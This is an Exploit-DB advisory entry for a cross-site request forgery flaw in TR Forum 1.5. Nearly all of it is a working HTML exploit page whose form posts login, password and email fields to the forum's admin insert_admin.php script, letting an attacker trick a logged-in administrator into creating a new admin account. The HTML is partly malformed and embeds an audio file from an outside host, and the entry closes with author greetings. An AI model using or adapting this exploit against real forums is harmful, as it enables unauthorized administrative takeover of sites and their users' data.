TR Forum 1.5 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

12385


Platform:

PHP

Published:

2010-04-25

========================================================================================                  
| # Title    : TR Forum 1.5 insert admin CSRF Vulnerability           
| # Author   : EL-KAHINA                                                               
| # email    : No-Mail                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : CSRF                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 insert admin CSRF :
 
 <html>
<head>
<form name="poster" method="post" action="http://127.0.0.1/forum/admin/insert_admin.php">
  <table class="header" border="0" align="center" width="500">
    <tr>
      <td align="center"><font class="titre">Ajouter un modérateur</font></td>
    </tr>
  </table>
  <br>
     <CENTER><EMBED align=left 
src=http://h1.ripway.com/ma3karouna/1.mp3
  <table class="right" width="500" border="0" align="center" >
<tr>
  <td class="text">login</td>
  <td><input type="text" name="login"></td>
</tr>
<tr>
  <td class="text">password</td>
  <td><input type="password" name="password"></td>
</tr>
<tr>
  <td class="text">email</td>
  <td><input type="text" name="mail"></td>
</tr>
<tr>
<td colspan="2" align="right"><input class="button" type="submit" value="valider"></td>
</tr>
</table>
<br>
</form>
</body>
</html>
 
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------